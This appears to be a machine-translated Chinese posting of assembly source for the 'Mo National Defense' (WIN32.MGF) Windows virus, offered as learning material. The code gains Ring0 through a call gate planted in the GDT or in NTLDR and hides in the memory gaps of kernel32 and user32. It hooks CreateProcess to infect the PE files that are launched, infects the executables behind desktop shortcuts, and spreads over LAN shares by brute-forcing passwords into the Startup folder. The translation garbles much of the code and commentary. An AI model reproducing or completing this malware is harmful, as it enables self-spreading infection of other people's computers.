"Mo National Defense" Virus (WIN32.MGF) source procedure
Warning: This program is only for learning research, which is not allowed to change the new variety of viruses, and it is not allowed to add destructive code, and you remember!
Wearing:; 1, worship Chen Yinghao, want to be with CiH a higher than high ;; 2. Communication technology, improve the level of the country (if you read the source program, track a virus, your technology will increase); ; 3, let the world know that China is still there;
Related Art: 1. 1, enter Ring0: Add CallGate directly to GDT directly in Win98; in Win 2000 / XP / 2003; CallGate is written in NTLDR, take effect after restart (original technology, this is also A vulnerability of Windows 2000 / XP / 2003). 2, resident memory: Since all DLL modules are loaded after memory, only 1k space is used in the file head, there is 3K space, so this virus; put its own 3K in the gap of kernel32.dll, there is 2K Placed in user32.dll, but Win98 is relatively special, and 2K is left with VXD; _pageallocate allocates space. The poison resides in the unconventional process and globalallol memory, but inserts into the module's gap, therefore, it is not seen that the virus is not seen, and it is more difficult to infect the file in the memory, so the virus is difficult to kill. it's here! A lot of anti-virus; software either can't find this virus, even if you find it, you can't kill or kill it, you can't clean it, and you will have no strength (original technology). ; 4, LAN propagation: Crack the remote host's shared password with its own password generator, and then copy the virus to the launch folder of the other party. ; 5, email spread: Oh, there is currently no such function!
Hazard estimation:; 1, affect the normal operation of the poisoned person; Operation (find Bill Gats, who told him to give you the MPR unbearable weight?) ;; 3, there is absolutely no damage to the data, covering BIOS, stealing information information and other malicious behavior.
The technology is constantly improving, maybe there is a more powerful virus, huh, huh
.586p.model flat, stdcalloption casemap: None
INCLUDE Windows.Include kernel32.incinclude user32.incinclude advapi32.include mpr.incincludelib kernel32.libincludelib user32.libludelib advapi32.libincludelib mpr.lib
VirusSize = VirusEnd-offset VirusStartVirusSizeP1 = offset _OtherMemPosition-offset VirusStart offset; IBDV VirusSizeP2 = VirusSize-VirusSizeP1 infected PE file memory portion; the second half of this toxic, inactive .codeVirusStart: noppushfdpushad
DB 0E8H, 0, 0, 0; this is a call command, which is equivalent to the Push Eippop EBX; EBX = EBX instructions in memory actual address MOV EDX, EBXMOV EBXSUB EBX, $ - 5; actual address - Design address = address difference = replacement value = EbxSub EDX, 8Call _getmoduleAddress; get the loading address of this process Add Eax, [EBX 3CH] MOV LPOLDPE [EBX], EAXSUB EDX, [EAX 28h] Sub Edx, [EAX 34h] add virusexit [ebx], edx; edx = repositioning value of this process, correct the original program entry
Mov Eax, [ESP 24h] Call_getmoduleaddress; get hkernel32mov hkernel32 [ebx], EAXMOV CALLGATESEL [EBX], 103H
Call_getc3address; find the address of RET (0xc3) in the kernel32.dll module
lea esi, [ebx FunctionNameTab 8]; first obtain LoadLibraryA, GetProcAddress, GetVersion address lea edi, FunctionAddressTab [ebx] mov ecx, 3 @@: lodsdadd eax, ebxpush eaxpush hKernel32 [ebx] call _GetProcAddressstosdloop @b
Call dwgetversion [EBX] SHR EAX, 31MOV DWVERSION [EBX], EAX; Windows version is put in dWVersion variable, 98 = 1, 2000 / xp / 2003 = 0
Call _ISwindows9x; if Win98 is immediately added to GDT to add Callgate
LEA ESI, [EBX FunctionNameTab 4 * 7] MOV ECX, 4 @@: lodsdadd EAX, EBX.IF DWVERSION [EBX] MOV BYTE PTR [EAX-2], 'a'.elsemov Byte PTR [EAX-2] , 'W'..ndifloop @B; process ANSI / UNICODE API function name
Call _ProcessimportTab; import all API functions
Lea Eax, Szuser32 [EBX] Push EaxCall DwloadLibrary [EBX] MOV HUSER32 [EBX], EAX
XOR edx, edxlar edx, callgatesel [ebx] .IF DH! = 0ech; if it is the first infection of 2000 / XP / 2003, write CallGate into NTLDR, infecting the desktop's shortcuts corresponding to the EXE file, waiting to restart the CallGate take effect
Push 4LEA Eax, SZNTLDR [EBX] Push EaxCall_Editfile
Call_Editlnkfile
.ELSE; if it is a 2000 / XP / 2003 in Win98 or memory, enter Ring0DW 9BffHDD Offset CallgateSel-4MOV EAX, Espmov ESP, [ESP 4]; Switch Stack Push Eaxmov Eax, CR0BTR EAX, 16MOV CR0, EAX Remove the Keernel32 module read-only memory page write protection
MOV EAX, LPOLDPE [EBX] MOV EDX, DWOLDENTRY [EBX] MOV [EAX 28H], EDXMOV EDX, DWOLDIMAGE [EBX] MOV [EAX 50H], EDX; Recovery Process Inlet and Image Size, Action Some Programs Self-protection
MOV EDI, HKERNEL32 [EBX] Add Edi, [EDI 3CH] MOV EDI, [EDI 54H] Add Edi, Hkernel32 [EBX] MOV LPMEMPSITION1 [EBX], Edilea ESI, VirusStart [EBX] MOV ECX, 10HREPZ CMPSB; Judgment Whether the virus is already in memory
.IF! ZERO?; NOT IN MEM.IF DWVERSION [EBX]; Not in memory push 0fhpush 0push -1push 0push 0push 0push 1push 1 @@: int 20h; vxd -> _ PageAllocatedd 00010053hadd ESP, 8 * 4le EDI, @ b [ebx ] MOV WORD PTR [EDI], 20CDHMOV DWORD PTR [EDI 2], 00010053H.ELSEMOV EAX, HUSER32 [EBX] Add Eax, [EAX 3CH] MOV EAX, [EAX 54H] Add Eax, HUSER32 [EBX]; 2000 / XP / 2003 --- "EAX = USER32.DLL module voids .Endifmov lpMemPosition2 [EBX], EAX
MOV EDI, LPMEMPSITION1 [EBX] Add Edi, Offset_BeforeApi-Offset VirusStartmov DWORD PTR [EBX SZNewcommand 1], EDI; Construction Jump Transfer to the command of the CreateProcess interception function
Mov ESI, DWCREATEPROCESS [EBX] Push Esilea EDI, SZOLDCOMMAND [EBX] MOV ECX, 6REP MOVSB; saving the top 6 bytes of CREATEPROCESS functions
Lea ESI, SZNewcommand [EBX] Pop Edimov ECX, 6Rep Movsb; Transform the first instruction of the CreateProcess function to jump into the intercept function
Lea ESI, VirusStart [EBX] MOV EDI, LPMEMPSITION1 [EBX] MOV ECX, VirussizeP1Rep Movsb; Front 3K Residence in Kernel32 Module
Mov EDI, Eaxmov ECX, VirussizeP2Rep Movsb; 2K after virus resides in the user32 module or vxd _pageallocate points to the page .enDIF
POP Esplea Eax, @ f [EBX] Push EaxRetf; return @@:
.endif
; Create thread for net taint.if dwVersion [ebx]; create infection LAN threads call _MemToFilelea eax, dwVersion [ebx] push eaxpush 0push 0lea eax, _GoLAN [ebx] push eaxpush 0push 0call dwCreateThread [ebx] .endif
ENTER 32, 0; Judgment Site Conditions Push EspCall Dwgetlocaltime [EBX] MOV AX, [ESP 2] MOV DL, 3DIV DL.IF AH == 0 && Word PTR [ESP 4]> = 5push 0le Eax, SzmessageTit [EBX ] Push Eaxle Eax, SzmeSsageText [EBX] Push Eaxpush 0Call DwMessageBox [EBX] .EndifleavePopadPOPFD
DB 68HVIRUSEXIT: DD OFFSET @f; if the virus returns the original program entry, return the control right to the original program; if the virus runs independently, @@:; Go back to the kernel32.dll module, exit the virus process (advanced skills, do not rely on EXITPROCESS). RET
Hkernel32 DD 0HUSER32 DD 0SZUSER32 DB 'USER32.DLL', 0
DWC3ADDRESS DD 0
DwoldImage DD 3000HDWoldentry DD 1000 HLPoldpe DD 0lpMemPosition1 DD 0lpMemPosition2 DD 0
DWVERSION DD 0CALLGATESEL DD 103H
Intercepting the first half of CreateProcess, mainly determined that the previous 6-byte of the original function is restored to ensure CREATEPROCESS; return to the second half of the intercepting function _beforeforeapi: pushfd; extend the stack space, the second half of the block Address Pushfd; Extended Stack Space, CreateProcess's Parameter Top 4 Byte Used Space Pushfd; Save Site PushadCLD
DB 0e8H, 0, 0, 0; Push Eippop EbxSub EBX, $ - 1; EBX = Relocation Value
MOV EDI, DWCREATEPROCESS [EBX] MOV [ESP 24h], Edilea ESI, SzoldCommand [EBX] MOV ECX, 6DW 9BFFHDD OFFSET CALLGATESEL-4REP MOVSB; enter Ring0 Restore CreateProcess's first 6 bytes of Lea Eax, @ f [ebx] PUSH EaxRetf @@:
MOV EAX, LPMEMPSITION1 [EBX] add eax, offset _behindapi-offset virusstartXCHG EAX, [ESP 2CH]; call the code of the CREATEPROCESS function to return the address, exchange the address of the intercepting function
Lea ESI, [ESP 2CH] Lea EDI, [ESP 28H] MOV ECX, 11REP MOVSDSTOSD; 10 parameters of the CreateProcess function move 4 bytes, and finally returned the address to the stack
MOV ESI, [ESP 28H 4]; the path to the EXE file. IF! ESIMOV ESI, [ESP 28H 4 4] .endif
ENTER 100H, 0xOR Eax, Eaxmov ECX, 100HLA EDI, [EBP-100H] Rep Stosb
XOR EDX, EDXLEA EDI, [EBP-100H] MOV ECX, 80H @@ :. if dwversion [ebx]
Lodsb.if al == 0stosbmov DL, 2.ELSEIF AL == 22Hinc Edx.elsestosb.Endif
.lse
Lodsw.if AX == 0stoswmov DL, 2.ELSEIF AX == 22 Hinc Edx.elsestosw.endif.Endif
CMP DL, 2LOOPNZ @B
.IF dwversion [EBX] Lea ESI, [EBP-100H 2] .elselea ESI, [EBP-100H 4] .ndifmov ECX, 4 @@ :. if dwversion [EBX] Lodsb.elselodsw.Endifshrd Edx, Eax, 8LOOP @BAND EDX, 0DFDFDFDFH; lowercase switch CMP EDX, 'niw /' jz @ f.if! Dwversion [ebx] && edx == 'ORP /' JMP @ F.Endif
Lea Edx, [EBP-100H]
Push 1Push Edxcall_Editfile; Infecting CreateProcess opened PE file
@@: LeavePopadPOPFDRET; Back to the original CreateProcess continues to execute
_Behindapi:; CREATEPROCESS will be jumped here, here is responsible for restoring its first 6 bytes as jump instructions, jump to the first half of the blocking function PushfdpushadCld
DB 0E8H, 0, 0, 0, 0POP EBXSUB EBX, $ - 1
Mov EDI, DWCREATEPROCESS [EBX] Lea ESI, SZNewcommand [EBX] MOV ECX, 6DW 9BFFHDD OFFSET CALLGATESEL-4REP MOVSBLEA EAX, @ f [EBX] Push EaxRetf @@:
PopadPopfdret; here really returning to CreateProcess address SzoldCommand DB 6 DUP (0) Sznewcommand DB 68H, 0, 0, 0, 0, 0C3HDB 0
Infecting the subprogram of the PE document; _dwflag ----- bit 0: 0 = NTLDR, 1 = pe; bit 1: 0 = MEM, 1 = file; bit 2: 0 = auto (ANSI / Unicode), 1 = ansi_EditFile proc _lpFileName, _dwFlaglocal @hFilelocal @hFileMaplocal @lpFileMaplocal @dwFileSizelocal @dwFileAttributeslocal @ stFileTime1: FILETIMElocal @ stFileTime2: FILETIMElocal @ stFileTime3: FILETIMEpushad
push _lpFileNamebt _dwFlag, 2.if CARRY call dwGetFileAttributesA [ebx] .elsecall dwGetFileAttributes [ebx] .endif; invoke GetFileAttributes, _lpFileName.if eax = - 1mov @ dwFileAttributes, eax?!
Push 80HPUSH _LPFILENAMEBT _DWFLAG, 2.IF Carry? Call DWsetFileAttributesa [EBX] .lsecall dwsetfileAttributes [EBX] .endif; Invoke setFileAttributes, _lpfilename, 80h
push 0push 80hpush 3push 0push 3push 0c0000000hpush _lpFileNamebt _dwFlag, 2.if CARRY call dwCreateFileA [ebx] .elsecall dwCreateFile [ebx] .endif;? invoke CreateFile, _lpFileName, 0c0000000h, 0,0,3,80h, 0.if eax =! 0FFFFFFFHMOV @ Hfile, Eaxpush EaxCall DwgetFileType [EBX] .IF EAX == file_type_disk
Push 0push @HfileCall DwgetFilesize [EBX]; Invoke getFileSize, @ hfile, 0mov @ dwfilesize, EAX
lea eax, @ stFileTime3push eaxlea eax, @ stFileTime2push eaxlea eax, @ stFileTime1push eaxpush @hFilecall dwGetFileTime [ebx]; invoke GetFileTime, @ hFile, addr @ stFileTime1, addr @ stFileTime2, addr @ stFileTime3
Push 0push 0push 0push 4push 0push @HfileCall dwcreatefilemapping [EBX]; Invoke CreateFilemapping, @ Hfile, 0, 4, 0, Eax, 0.if Eaxmov @ HfileMap, EAX
Push 0push 0push 0push 6push Eaxcall dwmapviewoffile [EBX]; Invoke MapViewoffile, Eax, 6,0,0,0.if Eaxmov @ lpfilemap, EAX
Bt _dwflag, 0.if carry? .if Word PTR [EAX] == 'zm'.if DWORD PTR [EAX 20H]! =' fgm'add Eax, [EAX 3CH] .IF DWORD PTR [EAX] = = 'EP'BT DWORD PTR [EAX 16H], 13.IF! Carry?
Push @lpfilemapcall dwunmapviewoffile [ebx]
Push @HfilemapCall DWCloseHandle [EBX]
Mov Eax, @ dwfilesizeadd eax, virussize; if it is a PE file that meets the condition, file size extension Virussize bytes
Push 0push eaxpush 0push 4push 0push @HfileCall dwcreatefilemapping [EBX] MOV @ HFILEMAP, EAX
Push 0push 0push 0push 6push eaxcall dwmapviewoffile [EBX] MOV @ lpfilemap, EAX
Add Eax, [EAX 3CH] MOVZX ECX, Word PTR [EAX 6] DEC ECXXCHG EAX, ECXMOV EDX, 28HMUL EDXCHG EAX, ECXMOVZX EDX, WORD PTR [EAX 14H] Add Edx, 18HADD EDX, EaxAdd Edx, ECX; Positioning in the last section
mov edi, @ lpFileMapadd edi, @ dwFileSizebt _dwFlag, 1.if CARRY? lea esi, VirusStart [ebx] mov ecx, VirusSizepushadrep movsbpopad.elsemov esi, lpMemPosition1 [ebx] mov ecx, VirusSizeP1pushadrep movsb.if dwVersion [ebx] mov esi, lpMemPosition2 [ebx] .elselea eax, szUser32 [ebx] push eaxcall dwLoadLibrary [ebx] mov esi, eaxadd esi, [esi 3ch] mov esi, [esi 54h] add esi, eax.endifmov ecx, VirusSizeP2rep movsbpopad.endif; Write the virus code into file MOV ECX, @ dwfilesizeadd ecx, virussizesub ECX, [EDX 14H] MOV [EDX 8], ECXMOV [EDX 10H], ECXMOV DWORD PTR [EDX 24H], 0E00000E0HMOV ECX, [EAX 50h] mov esi, offset dwOldImage-offset VirusStartmov [edi esi], ecxmov ecx, [eax 28h] mov esi, offset dwOldEntry-offset VirusStartmov [edi esi], ecxadd ecx, [eax 34h] mov esi, offset Virusexit-Offset VirusStartmov [EDI ESI], ECXSUB EDI, @ lpfilemapsub EDI, [EDX 14H] Add EDI, [EDX 12] MOV [EAX 28H], Edimov ECX, [EDX 12] Add ECX, [EDX 8] and cx, 0f000hadd ECX, 1000HMOV [EAX 50H], ECXMOV ECX, @ lpfilemapmov DWORD PTR [ECX 20H], 'FGM'; modify PE file header and write infected sign MGF
.endif; 'DLL'
.endif; 'EP'
.endif ;! 'fgm'
.endif; 'zm'
.else; _dwFlag; if it is NTLDR file, write CALLGATElea esi, szGdtData [ebx] mov edi, @ lpFileMapmov ecx, @ dwFileSize @@: inc edipush esipush edipush ecxmov ecx, 10hrepz cmpsbpop ecxpop edipop esiloopnz @b
. IF ZERO? XOR EAX, Eaxmov ECX, 80H @@: Sub EDI, 8PUSH EDIPUSH ECXMOV ECX, 8REPZ ScaSBPOP ECXPOP EdiloOPnz @B
.IF ZERO? Add Edi, 100HLEA ESI, SZCallgate [EBX] MOV ECX, 10HREP MOVSB
MOV EDX, DWC3ADDRESS [EBX] MOV WORD PTR [EDI-16], DXSHR EDX, 16MOV Word PTR [EDI-10], DX.Endif
.endif
.ndif; _dwflag
Push @lpfilemapcall dwunmapViewoffile [EBX]; Invoke UnmapViewoffile, @ lpfilemap.endif
push @hFileMapcall dwCloseHandle [ebx]; invoke CloseHandle, @ hFileMap.endiflea eax, @ stFileTime3push eaxlea eax, @ stFileTime2push eaxlea eax, @ stFileTime1push eaxpush @hFilecall dwSetFileTime [ebx]; invoke SetFileTime, @ hFile, addr @ stFileTime1, addr @ stFileTime2 Addr @ stfiletime3.endif
Push @HfileCall DWCloseHandle [EBX]; Invoke CloseHandle, @ hfile.endif
push @dwFileAttributespush _lpFileNamebt _dwFlag, 2.if CARRY call dwSetFileAttributesA [ebx] .elsecall dwSetFileAttributes [ebx] .endif;? call dwSetFileAttributes [ebx]; invoke SetFileAttributes, _lpFileName, @ dwFileAttributes.endif
POPADRET_EDITFILE ENDP
Szgdtdata DW 0FFFH, 0000, 9A00H, 00cfh, 0FFFH, 0000, 9200H, 00CFHSZCallgate DW 0000, 0108H, 0EC00H, 0000, 0FFFH, 0000, 9A00H, 00cfh
SZNTLDR DB 'C: / NTLDR', 0
The getProcadDress function, usage and kernel32.dll's getProcaddress _GetProcaddress proc buy ES ESI EDI, _HModule, _lpszprocnamelocal @dwsize
Mov Edx, _HModuleAdd Edx, [EDX 3CH] MOV EDX, [EDX 78H] Add Edx, _HModuleMov ECX, [EDX 18H] MOV ESI, [EDX 20H] MOV EDI, _LPSZPROCNAME
Push EDIPUSH ECXXOR EAX, EAXMOV ECX, 0FFFFFFFHREPNZ ScaSBNOT ECXDEC ECXMOV @ dwsize, ECX; Calculation Function Name Length POP ECXPOP EDI
Add ESI, _HModule @@: Push Edipush ECXMOV ECX, @ DWSELODSDADD EAX, _HModulexchg Eax, ESIREPZ CMPSBXCHG EAX, ESI Pop EcxPop EdiloPnz @B
.IF! ZERO? xor Eax, EaxRet.endif
Sub ESI, _HModulesub ESI, 4SUB ESI, [EDX 20H] SHR ESI, 1Add ESI, [EDX 24h] Add ESI, _HModuleLodsdmovzx ESI, AXSHL Eax, 2AX, [EDX 1CH] Add Eax, _HModuleMov Edx, [EAX ] add edx, _hmodulexchg Edx, EAX
RET_GETPROCADDRESS ENDP
Words of the LAN _Golan Proc Lparamlocal @Henumlocal @dwcountlocal @szResourceName [32]: Bytelocal @szbuffer [0C00H]: Bytepushad
DB 0E8H, 0, 0, 0POP EBXSUB EBX, $ - 1LEA EAX, @ Henumbush Eaxpush 0push 13hpush 0push 5call dwwnetopENENUM [EBX]
.if! eax.repeatmov @ dwcCount, -1lea eax, dwBufferSize [ebx] push eaxlea eax, @ szBufferpush eaxlea eax, @ dwcCountpush eaxpush @hEnumcall dwWNetEnumResource [ebx] cmp dword ptr [@ szBuffer 14h], 0jnz @ f.until Eaxpush @henumcall dwwnetcloseenum [ebx] .endifjmp _golaanexit
@@: push @henumcall dwwnetcloseenum [EBX] Lea EDI, @ szbuffer
_Nextpc: Push Edimov ESI, [EDI 14H] Lea EDI, @ SzResourceName @@: lodsbstosbor al, aljnz @BMOV DWORD PTR [EDI-1], 'C /' Pop Edi
XOR Eax, Eaxmov DWPassword [EBX], EAX
@@: lea edx, szlocaldrive [ebx] Push Edxpush EaxLea EDX, @ SzResourceNamepush EDXCALL DWNETADCONNECTION [EBX] .IF EAX == 56HCALL _GENPASSWORDCMP DWPASSWORD [EBX], 0JNZ @ B.ELSEIF! EAX
Push 0le Eax, Szdfile [EBX] Push Eaxlea Eax, Szsfile [EBX] Push EaxCall DwcopyFile [EBX]; If you find writable sharing, infecting MOV ESI, EAX
Push 1LEA Eax, Szlocaldrive [EBX] Push EaxCall Dwwnetcancelconnection [EBX] Call _genpasswordor ESI, ESIJZ @B
.endif
Add Edi, 20HDEC @dwccountjnz _nextpc
_Golanexit: popad_golan endp
SzmemTofilename DB 'UNBLASTER.EXE', 0SZSFILE DB 'C: /WINDOWS/SYSTEM/UNBLASTER.EXE', 0SZDFILE DB 'X: / Windows / All Users / Start Menu / Programs / Start /unblaster.exe' ,0
DWPassword DD 0DD 0, 0Szpassword DB 0SzlocalDrive DB 'x:', 0DWBuffersize DD 0C00H
_Genpassword:; generated subroutine, password includes 1234567890! @ # $% ^ Character STD
Pushadlea EDI, [EBX SZPassword-1] xor Edx, Edxmov Eax, Dwpassword [EBX] MOV ECX, 16
@@: div ECXXCHG EAX, EDX.IF AL <= 5ADD Al, 21h.ELSE; if Al> = 6 && Al <= 15ADD Al, 2AH.Endifstosbxor Eax, Eaxxchg Eax, Edxor Eax, Eaxjnz @B
Inc Ediinc DWPassword [EBX] MOV [ESP 20H-4], EDIPOPADCLDRET
_MEMTOFILE PROC; restore virus itself subroutine local @hfilelocal @Hfilemaplocal @lpfilemaplocal @lpsystemdir [40h]: Byte
push 40hlea edi, @ lpSystemDirpush edicall dwGetSystemDirectory [ebx]; invoke GetSystemDirectory, addr @ lpSystemDir, 100hadd edi, eaxmov al, '/' stosblea esi, szMemToFileName [ebx] mov ecx, 16rep movsb
push 0push 80hpush 2push 0push 0push 0c0000000hlea eax, @ lpSystemDirpush eaxcall dwCreateFileA [ebx];! invoke CreateFile, addr @ lpSystemDir, 0c0000000h, 0,0,2,80h, 0.if eax = 0ffffffffhmov @ hFile, eax
Mov Edx, VirussizeAdd Edx, 200h
Push 0PUSH EDXPUSH 0PUSH 4PUSH 0PUSH EaxCall dwcreatefilemapping [EBX]; Invoke CreateFileMapping, Eax, 0, 4, 0, EDX, 0.IF Eaxmov @ HfileMap, EAX
Push 0push 0push 0push 6push Eaxcall dwmapviewoffile [EBX]; Invoke MapViewoffile, Eax, 6,0,0,0.if Eaxmov @ lpfilemap, EAX
Mov EDI, ESMOV ESI, Hkernel32 [EBX] MOV ECX, 0A8HREP MOVSB; with Kernel32 DOS head MOV DWORD PTR [EAX 3CH], 0A8HMOV DWORD PTR [EAX 20H], 'Fgm'lea ESI, FileHead [EBX] MOV ecx, 120hrep movsb; original PE header xor eax, eaxmov ecx, 38hrep stosblea esi, VirusStart [ebx] mov ecx, VirusSizepush edirep movsb; virus code pop edimov esi, offset VirusExit-offset VirusStartmov dword ptr [edi esi], offset VirusExit 4
Push @lpfilemapcall dwunmapViewoffile [EBX]; Invoke UnmapViewoffile, @ lpfilemap.endif
Push @HfilemapCall dwclosehandle [EBX]; Invoke CloseHandle, @ hfilemap.endif
Push @HfileCall DWCloseHandle [EBX]; Invoke CloseHandle, @ hfile.endif
RET_MEMTOFILE ENDP
_ProcessimportTab:; Handmade Import Functions Lea ESI, FunctionNameTab [EBX] Lea Edi, FunctionAddresStab [EBX] @@: Lodsd
.IF EAX == 0ffffffffhlodsdadd Eax, EBXPUSH EAXCALL DWLOADLIBRARY [EBX] MOV ECX, EAX
.ELSEIF EAXADD EAX, EBXPUSH ECXPUSH EAXPUSH ECXCALL DWGETPROCADDRESS [EBX] Stosdpop Ecx.Endifor Eax, Eaxjnz @B
RET
_ISWINDOWS9X:; Add Callgate subroutine to Win98. IF! ZERO?; WIN9XXOR ECX, ECXPUSH ECXPUSH CXSGDT FWORD PTR [ESP] POP CXPOP EDISUB ECX, 8and CL, 0F8hor Cl, 3MOV Callgatesel [EBX], ECX
XOR EDX, EDXLAR EDX, ECX
.IF DH! = 0echand CL, 0F8HMOV EDX, DWC3ADDRESS [EBX] MOV WORD PTR [EDI ECX], DXSHR EDX, 16MOV Word PTR [EDI ECX 6], DXMOV DWORD PTR [EDI ECX 2], 0ec000028h .endif
.endifret
_Getmoduleaddress: @@: and ax, 0f000HSUB EAX, 1000HCMP WORD PTR [EAX], 'zm'jnz @BMOV ECX, EaxAdd ECX, [ECX 3CH] CMP DWORD PTR [ECX],' ep'jnz @bret
_Getc3address: Mov Edi, Hkernel32 [EBX] Add Edi, 1000HMOV ECX, 20000HMOV AL, 0C3HCLDREPNZ ScaSBDEC Edimov DWC3ADDRESS [EBX], EDIRET
FunctionAddressTab: dwLoadLibrary dd 0dwGetProcAddress dd 0dwGetVersion dd 0dwCloseHandle dd 0dwCreateProcess dd 0dwCreateFile dd 0dwGetFileAttributes dd 0dwSetFileAttributes dd 0dwCreateFileA dd 0dwGetFileAttributesA dd 0dwSetFileAttributesA dd 0dwGetSystemDirectory dd 0dwCreateFileMapping dd 0dwCreateThread dd 0dwGetFileSize dd 0dwGetFileTime dd 0dwSetFileTime dd 0dwGetFileType dd 0dwGetLocalTime dd 0dwCopyFile dd 0dwMapViewOfFile dd 0dwUnmapViewOfFile dd 0dwFindFirstFile dd 0dwFindNextFile dd 0dwFindClose dd 0dwMessageBox dd 0dwRegCloseKey dd 0dwRegCreateKeyEx dd 0dwRegOpenKeyEx dd 0dwRegQueryValueEx dd 0dwRegSetValueEx dd 0dwWNetAddConnection dd 0dwWNetCancelConnection dd 0dwWNetCloseEnum dd 0dwWNetEnumResource dd 0dwWNetOpenEnum dd 0
_Thermemposition:; 2K in the second half of elsewhere
FunctionNameTab: dd 0ffffffffhdd offset szKernel32dd offset szLoadLibraryAdd offset szGetProcAddressdd offset szGetVersiondd offset szCloseHandledd offset szCreateProcessdd offset szCreateFiledd offset szGetFileAttributesdd offset szSetFileAttributesdd offset szCreateFileAdd offset szGetFileAttributesAdd offset szSetFileAttributesAdd offset szGetSystemDirectoryAdd offset szCreateFileMappingAdd offset szCreateThreaddd offset szGetFileSizedd offset szGetFileTimedd offset szSetFileTimedd offset szGetFileTypedd offset szGetLocalTimedd offset szCopyFileAdd offset szMapViewOfFiledd offset szUnmapViewOfFiledd offset szFindFirstFileAdd offset szFindNextFileAdd offset szFindClosedd 0ffffffffhdd offset szUser32dd offset szMessageBoxAdd 0ffffffffhdd offset szADVAPI32dd offset szRegCloseKeydd offset szRegCreateKeyExAdd offset szRegOpenKeyExAdd offset szRegQueryValueExAdd offset szRegSetValueExAdd 0ffffffffhdd offset szMPRdd offset szWNetAddConnectionAdd offset szWNetCancelConnectionAdd offset szWNe TcloseEnumdd Offset SzwneetenumResourceAdd Offset SzwNetopeNenumAdd 0
szKernel32 db 'kernel32.dll', 0szLoadLibraryA db 'LoadLibraryA', 0szGetProcAddress db 'GetProcAddress', 0szGetVersion db 'GetVersion', 0szCloseHandle db 'CloseHandle', 0szCreateProcess db 'CreateProcessW', 0szCreateFile db 'CreateFileW', 0szGetFileAttributes db 'GetFileAttributesW', 0szSetFileAttributes db 'SetFileAttributesW', 0szCreateFileA db 'CreateFileA', 0szGetFileAttributesA db 'GetFileAttributesA', 0szSetFileAttributesA db 'SetFileAttributesA', 0szGetSystemDirectoryA db 'GetSystemDirectoryA', 0szCreateFileMappingA db 'CreateFileMappingA', 0szCreateThread db 'CreateThread', 0szGetFileSize db 'GetFileSize', 0szGetFileTime db 'GetFileTime', 0szSetFileTime db 'SetFileTime', 0szGetFileType db 'GetFileType', 0szGetLocalTime db 'GetLocalTime', 0szCopyFileA db 'CopyFileA', 0szMapViewOfFile db 'MapViewOfFile', 0szUnmapViewOfFile db 'UnmapViewOfFile', 0szFindFirstFileA db 'FindFirstFileA', 0szFindNextFileA db 'FindNextFileA ', 0SzFindClose DB' FindClose ', 0; Szuser32 DB' User32.dll ', 0SzMessageBoxa DB' MessageBoxa ', 0szADVAPI32 db 'ADVAPI32.dll', 0szRegCloseKey db 'RegCloseKey', 0szRegCreateKeyExA db 'RegCreateKeyExA', 0szRegOpenKeyExA db 'RegOpenKeyExA', 0szRegQueryValueExA db 'RegQueryValueExA', 0szRegSetValueExA db 'RegSetValueExA', 0szMPR db 'MPR.dll', 0szWNetAddConnectionA db 'WNetAddConnectionA ', 0SzwnetCancelConnectiona DB' WnetcancelConnectiona ', 0SzwnetCloseenum DB' WnetCloseenum ', 0SzwnetenumResourceA DB' WneetenumResourceA '
, 0szWNetOpenEnumA db 'WNetOpenEnumA', 0_EditLnkFile proc; infection desktop shortcut subroutine local @hFilelocal @hFileMaplocal @lpFileMaplocal @hFindFilelocal @dwFileSizelocal @dwBufferSizelocal @lpBuffer [80h]: bytelocal @ stWin32FindData: WIN32_FIND_DATApushad
Lea Eax, @ hfilepush eaxpush 1push 0le eax, szregkeydesktop [ebx] push eaxpush 80000001hcall dwregopenkeyex [ebx] .IF! EAX
Mov @ dwbuffersize, 80hle Eax, @ dwbuffersizepush eaxlea eax, @ lpbufferpush eaxpush 0 push 0le eax, szdesktopvalue [EBX] Push Eaxpush @HfileCall DwregQueryValueex [EBX]
Push @HfileCall dwregClosekey [EBX]
Dec @dwbuffersizelea edi, @ lpbufferadd edi, @ dwbuffersize.if byte PTR [EDI-1]! = '/' MOV Al, '/' Stosbinc @ dwbuffersize.endifmov Eax, 'NL. *' Stosdmov Eax, 'K'StosD
lea eax, @ stWin32FindDatapush eaxlea eax, @ lpBufferpush eaxcall dwFindFirstFile [ebx]; to find the first lnk file; invoke FindFirstFile, addr @ lpBuffer, addr @ stWin32FindData.if eax = INVALID_HANDLE_VALUEmov @ hFindFile, eax.repeat!
MOV EAX, DWORD PTR [@ stwin32finddata 20h] MOV @ dwfilesize, EAX
Mov ECX, @ dwbuffersizelea EDI, @ stwin32finddata 2chsub Edi, Ecxlea ESI, @ lpbufferpush EdiRep MovsBPOP EDI
Push 0push 80hpush 3push 0push 1push 80000000hpush edicall dwcreatefilea [EBX]; Invoke Createfile, EDI, 80000000H, 1, 0, 3, 80H, 0.IF EAX! = 0Ffffffffhmov @ Hfile, EAX
Push 0push 0push 0push 2push 0push Eaxcall dwcreatefilemapping [EBX]; Invoke CreateFilemapping, Eax, 0, 2, 0, 0.if Eaxmov @ HfileMap, EAX
Push 0push 0push 0push 4push Eaxcall dwmapviewoffile [EBX]; Invoke MapViewoffile, Eax, 4,0,0,0.if Eaxmov @ lpfilemap, EAX
Lea ESI, [EAX 65H] MOV EDI, ESIV ECX, @ dwfilesizesub ECX, 66H @@: incovush ESIPUSH EDIPUSH ECXMOV ECX, 3REPZ CMPSB; Copy * Path in the exe file in the * .lnk file pop ECXPOP EDIPOP EsiloPnz @B. ? if ZERO && byte ptr [edi 3] mov esi, edisub edi, @ lpFileMapmov ecx, @ dwFileSizesub ecx, edilea edi, @ stWin32FindDatapush edi @@: lodsbstosbor al, alloopnz @bpop edimov eax, [edi 2] and eax 0DFDFDFDFH.IF EAX == 'niw /' xor edi, edi.else.if! Dwversion [ebx] && eax == 'ORP /' XOR EDI, EDI.Endif.Endif
.ELSEXOR EDI, EDI.ENDIF
Push @lpfilemapcall dwunmapViewoffile [EBX]; Invoke UnmapViewoffile, @ lpfilemap.endif
Push @HfilemapCall dwclosehandle [EBX]; Invoke CloseHandle, @ hfilemap.endif
Push @HfileCall DWCloseHandle [EBX]; Invoke CloseHandle, @ hfile.endif
. IF Edipush 7Push Edicall_Editfile; eligible, infected. Nendif
lea eax, @ stWin32FindDatapush eaxpush @hFindFilecall dwFindNextFile [ebx]; to continue the search lnk files; invoke FindNextFile, @ hFindFile, addr @ stWin32FindData.until eax == 0push @hFindFilecall dwFindClose [ebx]; invoke FindClose, @ hFindFile.endif
.endif
